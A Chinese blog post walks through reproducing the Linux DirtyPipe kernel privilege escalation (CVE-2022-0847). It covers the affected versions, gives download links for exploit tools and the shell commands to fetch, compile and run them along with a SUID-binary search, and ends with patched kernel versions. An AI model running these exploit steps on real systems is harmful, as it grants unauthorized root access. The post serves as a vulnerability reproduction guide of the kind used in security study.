Linux DirtyPipe内核提权漏洞(CVE-2022-0847)

前言

今天3月8号女神节,女领导和女同事接到通知,都提前回家过节去了,领导走了,这不就很清闲了嘛,想干啥就干啥。然而,今天又爆出一个提权漏洞,这不得学一手。

0x01 漏洞描述

CVE-2022-0847-DirtyPipe-Exploit CVE-2022-0847 是存在于 Linux内核 5.8 及之后版本中的本地提权漏洞。攻击者通过利用此漏洞,可覆盖重写任意可读文件中的数据,从而可将普通权限的用户提升到特权 root。CVE-2022-0847 的漏洞原理类似于 CVE-2016-5195 脏牛漏洞(Dirty Cow),但它更容易被利用。漏洞作者将此漏洞命名为“Dirty Pipe”

0x02 漏洞影响范围

影响范围:5.8 <= Linux 内核版本 < 5.16.11 / 5.15.25 / 5.10.102

0x03 漏洞复现

方法一:使用Dirty-Pipe.sh文件进行提权,附下载链接https://github.com/imfiver/CVE-2022-0847

cd CVE-2022-0847
ls
whoami
bash ./Dirty-Pipe.sh
whoami

在这里插入图片描述
方法二:使用dirtypipez.c文件进行提权,附下载链接https://haxx.in/files/dirtypipez.c

mkdir dirtypipez
cd dirtypipez
wget https://haxx.in/files/dirtypipez.c
gcc dirtypipez.c -o dirtypipez

在这里插入图片描述
在使用这个POC时, 需要事先找到一个具有 SUID 权限的可执行文件,然后利用这个文件进行提权,使用以下命令可以找到这类文件

find / -perm -u=s -type f 2>/dev/null

在这里插入图片描述

0x04 漏洞修复

更新升级 Linux 内核到以下安全版本:
Linux 内核 >= 5.16.11
Linux 内核 >= 5.15.25
Linux 内核 >= 5.10.102

0x05 参考

https://mp.weixin.qq.com/s/6VebZCKAv6kkmQme4GCQ_w
https://mp.weixin.qq.com/s/y7q8BwnxelcPvrsI0L_sqg

  • 3
    点赞
  • 17
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值